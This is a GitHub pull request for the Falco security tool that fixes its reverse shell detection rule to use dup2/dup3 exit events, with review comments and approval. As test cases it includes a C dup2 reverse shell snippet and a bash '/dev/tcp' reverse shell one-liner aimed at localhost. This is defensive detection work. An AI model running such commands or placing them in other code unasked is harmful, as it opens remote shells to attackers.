Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(rules): use exit event in reverse shell detection rule #2076

Merged
merged 2 commits into from Jun 23, 2022
Merged

fix(rules): use exit event in reverse shell detection rule #2076

merged 2 commits into from Jun 23, 2022

Conversation

alacuku
Copy link
Member

@alacuku alacuku commented Jun 20, 2022
edited 

Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>

What type of PR is this?

Uncomment one (or more) /kind <> lines:

/kind bug

/kind cleanup

/kind design

/kind documentation

/kind failing-test

/kind feature

If contributing rules or changes to rules, please make sure to also uncomment one of the following line:

/kind rule-update

/kind rule-create

Any specific area of the project related to this PR?

Uncomment one (or more) /area <> lines:

/area build

/area engine

/area rules

/area tests

/area proposals

What this PR does / why we need it:
This PR updates the reverse shell detection rule to be triggered when a dup2 or dup3 is called. Before the falcosecurity/libs#385 the dup2 and dup3 events were sent to userspace as dup events.

Which issue(s) this PR fixes:

In some cases the rule is not triggered when a reverse shell is spawned. That's because in the rule we are checking that the file descriptor passed to the dup functions is of type socket and its fd number is 0, 1 or 2 and the event direction is enter. The following code snippet is not detected as a reverse shell:

    connect(socket_fd, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr_in));
    dup2(socket_fd, STDIN_FILENO);
    dup2(socket_fd, STDOUT_FILENO);
    dup2(socket_fd, STDERR_FILENO);

That's obvious since we are not passing a file descriptor to the dup2 syscall that satisfies the conditions required by the rule.

On the other hand a command like this one: /bin/bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 (#1152 ) triggers the rule.
Digging a little bit deeper we see that the following syscalls are involved:

23889 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
23889 connect(3, {sa_family=AF_INET, sin_port=htons(9999), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
23889 dup2(3, 1)                        = 1
23889 close(3)                          = 0
23889 dup2(1, 2)                        = 2
23889 dup2(1, 0)                        = 0
23889 fcntl(1, F_GETFD)                 = 0
23889 execve("/usr/bin/bash", ["bash", "-i"], 0x56212e810be0 /* 21 vars */) = 0
23889 brk(NULL)                         = 0x5571dcec9000

The first dup2(3,1) is not detected by the rule but the subsequent calls are.

The right way to detect such scenarios is to check the returned file descriptor in the exit events. In order to avoid dealing explicitly with the event direction we use the following field evt.rawres in (0, 1, 2) present in the exit events.

Fixes #

Special notes for your reviewer:

As @leogr noted here, this PR needs to be merged after we bump Falco with a new driver version.

Does this PR introduce a user-facing change?:

fix(rules): use exit event in reverse shell detection rule

@alacuku
fix(rules): use exit event in reverse shell detection rule
831f203 
In some cases the rule is not triggered when a reverse shell is spawned.
That's because in the rule we are checking that the file descriptor passed
as argument to the dup functions is of type socket and its fd number is "0, 1, or 2"
and the event direction is "enter".
The following event does not trigger the rule: dup2(socket_fd, STDIN_FILENO);
But using the exit event the rule is triggered.

Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
@poiana poiana requested review from Kaizhe and leodido June 20, 2022 10:16
@poiana poiana added the size/XS label Jun 20, 2022
@alacuku
update(rules): add macro for dup syscalls
017fb31 
Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
@jasondellaluce
Copy link
Contributor

/milestone 0.32.1

@poiana poiana added this to the 0.32.1 milestone Jun 21, 2022
@loresuso
Copy link
Member

This is great! Thank you @alacuku!

@Kaizhe
Copy link
Contributor

Kaizhe commented Jun 23, 2022

Good job!

@poiana poiana added the lgtm label Jun 23, 2022
@poiana
Copy link

poiana commented Jun 23, 2022

LGTM label has been added.

Git tree hash: f79d288ba3da56976248773b2cf06938982fc24a

jasondellaluce
jasondellaluce approved these changes Jun 23, 2022
View reviewed changes
Copy link
Contributor

@jasondellaluce jasondellaluce left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

/approve

@poiana
Copy link

poiana commented Jun 23, 2022

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: alacuku, jasondellaluce

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@poiana poiana merged commit d904213 into falcosecurity:master Jun 23, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Kaizhe Kaizhe Kaizhe approved these changes

@jasondellaluce jasondellaluce jasondellaluce approved these changes

@leodido leodido Awaiting requested review from leodido

Assignees

@Kaizhe Kaizhe

@jasondellaluce jasondellaluce

Labels
approved area/rules dco-signoff: yes kind/bug kind/rule-update lgtm release-note size/XS
Projects
None yet
Milestone
0.32.1
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@alacuku @jasondellaluce @loresuso @Kaizhe @poiana